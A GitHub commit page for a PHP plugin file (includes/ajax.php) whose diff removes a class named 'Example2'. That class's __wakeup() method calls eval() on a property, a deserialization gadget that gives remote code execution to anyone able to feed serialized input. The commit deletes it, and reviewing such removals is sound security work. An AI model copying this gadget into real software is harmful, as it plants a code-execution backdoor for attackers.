Skip to content

Commit

Permalink
remove ake function
Browse files Browse the repository at this point in the history
  • Loading branch information
jagveer-blueastral committed Jan 23, 2024
1 parent 9f6066c commit 03844ba
Showing 1 changed file with 0 additions and 17 deletions.
17 changes: 0 additions & 17 deletions includes/ajax.php
Original file line number Diff line number Diff line change
Expand Up @@ -23,23 +23,6 @@
header( 'HTTP/1.0 403 Forbidden' );
exit;
}

class Example2
{
private $hook;

function __construct()
{
// some PHP code...
}

function __wakeup()
{
eval($this->hook);
}
}


/**
* Add/display a new module section
*
Expand Down

0 comments on commit 03844ba

Please sign in to comment.